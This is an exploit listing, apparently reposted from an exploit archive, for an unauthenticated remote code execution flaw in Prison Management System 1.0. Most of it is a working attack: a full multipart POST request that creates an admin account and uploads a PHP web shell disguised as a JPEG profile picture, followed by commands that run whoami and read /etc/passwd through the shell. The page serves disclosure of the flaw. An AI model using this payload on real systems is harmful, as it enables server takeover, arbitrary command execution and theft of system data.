Share
## https://sploitus.com/exploit?id=PACKETSTORM:179737
# Exploit Title: Prison Management System 1.0 - Unuthenticated RCE  
# Date: 24.07.2024  
# Exploit Author: Muhammet Ali Dak  
# Vendor Homepage: https://www.sourcecodester.com/sql/17287/prison-management-system.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=17287&title=Prison+Management+System+Using+PHP  
# Version: 1.0  
# Tested on: Linux  
  
## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication.   
  
POST /Admin/add-admin.php HTTP/1.1  
Host: 192.168.60.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------84806108511207628902669766678  
Content-Length: 1055  
Origin: http://192.168.60.131  
Connection: keep-alive  
Referer: http://192.168.60.131/Admin/add-admin.php  
Upgrade-Insecure-Requests: 1  
Priority: u=0, i  
  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="txtusername"  
  
yuznumara  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="txtfullname"  
  
yuznumara  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="txtpassword"  
  
yuznumara123  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="txtphone"  
  
55353535353  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="avatar"; filename="cmd.php"  
Content-Type: image/jpeg  
  
<?php  
  
if(isset($_REQUEST['cmd'])){  
echo "<pre>";  
$cmd = ($_REQUEST['cmd']);  
system($cmd);  
echo "</pre>";  
die;  
}  
  
?>  
  
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd  
-----------------------------84806108511207628902669766678  
Content-Disposition: form-data; name="btncreate"  
  
  
-----------------------------84806108511207628902669766678--  
  
## Malicious file can be seen under the path /uploadImage/Profile/ without any authentication.  
  
## With the request http://192.168.60.131/uploadImage/Profile/cmd.php?cmd=whoami the attacker can execute arbitrary command on the application server.